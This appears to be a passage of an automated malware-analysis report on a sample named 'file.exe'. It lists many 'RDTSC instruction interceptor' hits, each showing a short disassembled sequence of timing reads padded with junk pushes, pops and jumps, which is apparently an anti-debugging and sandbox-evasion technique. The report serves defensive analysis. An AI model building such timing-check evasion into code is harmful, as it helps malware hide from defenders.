              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFFD8 second address: ABFFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0067 second address: AC0071 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0933B second address: B0933F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0EC86 second address: B0EC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1135B second address: B11361 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11361 second address: B11377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB10CBE428Ah 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11377 second address: B1137E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B115F7 second address: B115FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B115FB second address: B11611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B173D1 second address: B173F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE428Bh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FB10CBE428Ch 0x00000011 js 00007FB10CBE4286h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B173F4 second address: B173FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B173FA second address: B1741A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007FB10CBE429Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17596 second address: B1759A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17CAC second address: B17CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18A68 second address: B18A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18D54 second address: B18D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FB10CBE4286h 0x0000000e jl 00007FB10CBE4286h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18D68 second address: B18D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1DF74 second address: B1DF8B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB10CBE428Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1DF8B second address: B1DF99 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CFC9 second address: B1CFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D197 second address: B1D1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D2D4 second address: B1D30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB10CBE428Ch 0x0000000a popad 0x0000000b jnc 00007FB10CBE42B3h 0x00000011 je 00007FB10CBE4288h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB10CBE4299h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D30F second address: B1D313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D461 second address: B1D46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D46A second address: B1D474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB10CD320F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D474 second address: B1D47C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D47C second address: B1D481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D481 second address: B1D487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D787 second address: B1D7A8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jo 00007FB10CD320F6h 0x00000011 jbe 00007FB10CD320F6h 0x00000017 pop ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7A8 second address: B1D7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7AE second address: B1D7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FB10CD32103h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7CB second address: B1D7D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7D3 second address: B1D7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7D7 second address: B1D7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D93D second address: B1D943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D943 second address: B1D95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CBE4293h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D95B second address: B1D977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB10CD32108h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1DB99 second address: B1DBBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FB10CBE4296h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AA1E second address: A6AA68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FB10CD320F6h 0x00000009 jg 00007FB10CD320F6h 0x0000000f pop edx 0x00000010 jmp 00007FB10CD32103h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007FB10CD320FEh 0x0000001f pushad 0x00000020 popad 0x00000021 jl 00007FB10CD320F6h 0x00000027 jmp 00007FB10CD32105h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AA68 second address: A6AA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB10CBE4299h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AA2C second address: B2AA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AB95 second address: B2ABB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB10CBE4292h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2ABB0 second address: B2ABB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2ABB6 second address: B2ABC9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007FB10CBE4286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edi 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2ACF8 second address: B2AD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B014 second address: B2B020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB10CBE4286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B020 second address: B2B037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB10CD320FEh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B037 second address: B2B053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4292h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B053 second address: B2B057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B057 second address: B2B05B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29DAC second address: B29DD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FB10CD320F6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c push esi 0x0000000d jmp 00007FB10CD320FFh 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29DD0 second address: B29DE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE428Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33380 second address: B33388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33388 second address: B333B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB10CBE4286h 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FB10CBE428Fh 0x00000012 ja 00007FB10CBE4288h 0x00000018 jng 00007FB10CBE4292h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B333B4 second address: B333BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DDE second address: B32DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3306B second address: B3309A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB10CD320FEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007FB10CD320FDh 0x00000012 pop ecx 0x00000013 ja 00007FB10CD320FCh 0x00000019 jg 00007FB10CD320F6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3309A second address: B330AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB10CBE4286h 0x0000000a jns 00007FB10CBE4286h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3E5C0 second address: B3E5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3E5C6 second address: B3E5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3E17A second address: B3E180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3E180 second address: B3E184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3E184 second address: B3E1AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD320FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB10CD32106h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43E7B second address: B43E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43E81 second address: B43E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FB10CD320F6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E0F1 second address: B4E126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB10CBE4286h 0x0000000a jmp 00007FB10CBE428Bh 0x0000000f popad 0x00000010 pop edx 0x00000011 jbe 00007FB10CBE42AFh 0x00000017 jmp 00007FB10CBE4294h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DF85 second address: B4DF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD32100h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B513A8 second address: B513AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B513AE second address: B513B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B513B2 second address: B513BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B513BA second address: B513BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5585A second address: B5586F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FB10CBE4286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007FB10CBE4286h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58797 second address: B587CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jnp 00007FB10CD320F6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FB10CD320FDh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FB10CD32107h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B587CF second address: B587D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B587D5 second address: B587E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD320FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B587E4 second address: B587F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB10CBE4286h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B442 second address: B5B448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B448 second address: B5B457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FB10CBE4286h 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D5E2 second address: B5D5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B664C8 second address: B6650A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FB10CBE428Ah 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007FB10CBE428Ah 0x00000011 jmp 00007FB10CBE428Ch 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e jl 00007FB10CBE4286h 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 jbe 00007FB10CBE428Ah 0x0000002d push eax 0x0000002e pop eax 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64BCE second address: B64BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64F39 second address: B64F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6509E second address: B650C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FB10CD3210Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B650C0 second address: B650D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CBE428Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6550F second address: B65513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65513 second address: B6553E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB10CBE4295h 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB10CBE4286h 0x00000015 jns 00007FB10CBE4286h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6AD40 second address: B6AD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6AD44 second address: B6AD49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6AD49 second address: B6AD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jmp 00007FB10CD320FDh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A9FB second address: B6A9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A9FF second address: B6AA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6AA05 second address: B6AA12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007FB10CBE4286h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72B79 second address: B72B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72B7F second address: B72B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jc 00007FB10CBE4286h 0x00000016 ja 00007FB10CBE4286h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72B9D second address: B72BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FB10CD32102h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75849 second address: B75862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007FB10CBE4291h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7BEA7 second address: B7BED7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB10CD32105h 0x0000000e jmp 00007FB10CD32101h 0x00000013 pop eax 0x00000014 rdtsc
